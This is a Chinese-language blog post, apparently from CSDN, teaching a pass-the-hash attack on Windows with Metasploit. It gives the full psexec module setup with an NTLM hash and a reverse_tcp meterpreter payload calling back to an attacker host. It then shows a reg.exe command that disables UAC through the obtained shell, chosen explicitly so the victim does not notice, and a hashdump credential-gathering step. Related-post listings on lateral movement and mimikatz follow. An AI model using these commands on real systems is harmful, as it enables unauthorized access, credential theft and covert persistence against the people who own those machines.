后渗透模块之Hash传递

最新推荐文章于 2024-05-14 04:48:15 发布
最新推荐文章于 2024-05-14 04:48:15 发布
阅读量380 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/113180889
版权

前言

我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。

利用过程

前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块
在这里插入图片描述

use exploit/windows/smb/psexec
set rhosts 192.168.75.139
set smbuser pyh(普通管理员账户)
set smbpass aad3b435b51404eeaad3b435b51404ee:588feb889288fb953b5f094d47d1565c
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.128
set lport 3333
show options
run

在这里插入图片描述

执行攻击之后发现我们的攻击被UAC阻拦了
在这里插入图片描述
这里提供两种关闭UAC的方式,第一种是直接在Windows系统中的控制面板中的用户和账户,管理用户控制设置,然后将其调到最低。
在这里插入图片描述
在这里插入图片描述
但是考虑到你在渗透别人的系统,不可能先通知别人先关闭防火墙,这样我们的行踪就会暴露,因此我提倡使用第二种方式,通过得到的shell改变UAC注册表总的值

进入shell后,执行reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,路径符号一定要写对,那个是UAC在注册表中的位置
在这里插入图片描述
修改成功后使用shutdown -g重启电脑,在这之前,我提倡先使用hashdump模块对普通密码进行猜解

use post/windows/gather/hashdump
set session 4
run

在这里插入图片描述

总结:在我们对目标的hash值不能进行爆破成功的时候,我们可以采用hash传递的方式登入目标系统,这也不失为一种好的渗透思路。

平凡的学者
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
海量数据解决思路之Hash算法
01-30
本文将粗略讲述一下Hash算法的概念特性,里边会结合分布式系统负载均衡实例对Hash的一致性做深入探讨。另外,探讨一下Hash算法在海量数据处理方案中的通用性。最后,从源代码出发,具体分析一下Hash算法在MapReduce...
哈希传递
2301_77915293的博客
07-06 125
Windows操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在 ntds.dit_中加密后为散列值。Windows 操作系统中的密码一般由两部分组成一部分为 LM Hash,另一部分为 NTLMHash。在 Windows 操作系统中,Hash 的结构通常如下。
内网安全“小迪安全课堂笔记”域横向
weixin_42902126的博客
05-09 3803
内网安全内网安全-域环境&工作组&局域网探针方案基本认知域环境与工作组的区别环境靶机案例 1-基本信息收集操作演示案例 2-网络信息收集操作演示案例 3-用户信息收集操作演示案例 4-凭据信息收集操作演示计算机用户 HASH,明文获取-mimikatz(win),mimipenguin(linux)计算机各种协议服务口令获取-LaZagne(all),XenArmor(win)案例 5-探针主机域控架构服务操作演示涉及资源域横向批量at&schtasks&impacket 内
哈希传递常用方法_hash传递工具(1)
最新发布
2401_84972799的博客
05-14 714
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3444
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
hash传递攻击
qq_58000413的博客
06-05 749
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
内网横传之哈希传递(Pass The Hash
11-25 7300
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
Prototype使用指南之hash.js
12-08
由于Hash对象继承自`Enumerable`模块,因此它拥有如`each`, `collect`, `map`, `detect`等方法,可以方便地对Hash进行迭代和操作。例如,如果你想遍历并打印所有的键值对,你可以这样做: ```javascript myHash....
内存Hash算法模块详细设计说明
09-08
内存Hash算法模块详细设计说明内存Hash算法模块详细设计说明
AngularJS模块学习之Anchor Scroll
11-25
当你想要在点击某个链接或者执行某个动作后,让页面自动滚动到页面内的某个特定ID位置时,`$anchorScroll()`就能派上用场。例如,你在HTML中定义了一个ID为“myDiv”的元素: ```html <!-- 内容 --> ``` 然后,...
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1593
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
使用cs与msf进行内网横向移动
qq_46635165的博客
10-10 4613
使用cs与msf进行内网横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内网 1, 将目标上线至CS 2, 使用cs探测内网信息 查看当前目标系统网络情况,确认目标系统所在内网网段 3, 使用cs的portscan功能对内网进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内网横向移动 对当前目标系统所获取
小迪渗透&内网渗透(玖)
weixin_41665162的博客
09-04 4227
文章目录64. 域环境&工作组&局域网方针(65-72) 64. 域环境&工作组&局域网方针(65-72)
CS功能性小结
weixin_61425169的博客
02-20 576
Cobalt Strike 域名上线 窃取令牌 哈希传递 域前置 cs和msf联动,cs和msf相互派生原理
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1733
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
网安学习-内网渗透2
weixin_44770698的博客
07-29 815
网络安全学习-内网渗透2
【内网安全】域横向批量at&schtasks&impacket
_Co1a
09-11 1305
2008 r2 webserver 域内web服务器 本地管理员账号密码 : .\administraotr:admin!@#45 当前机器域用户密码 : god\webadmin:admin!@#45 2003 x86 fileserver 域内文件服务器 本地管理员账号密码 : administrator : admin 当前机器域用户密码 : god\fileadmin : Admin12345 2008 r2 x64 dc god.org 主域控机器 域管账号...
内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递
网络安全领域___专研者.
06-09 2696
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
内网安全-域横向批量at&schtasks&impacket
m0_61506558的博客
10-22 1087
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令。在3中都是批处理命令,只能遍历一个变量,如果想要遍历多个变量,比如IP、用户名、密码等,可以写python脚本,免杀,使用Pyinstaller打包成exe文件,上传到目标机器运行。命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令。建立IPC常见的错误代码。
python_gnupg模块hash
06-12
抱歉,我不太明白你的问题。你是想了解python_gnupg模块如何使用哈希(hash)吗?如果是的话,python_gnupg模块可以使用哈希算法来加密和解密数据。具体来说,你可以使用哈希算法来生成数据的摘要,然后使用GPG密钥对该摘要进行签名。这样可以确保数据的完整性和不可抵赖性。但是,请注意,哈希算法仅用于生成数据的摘要,而不是加密数据本身。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值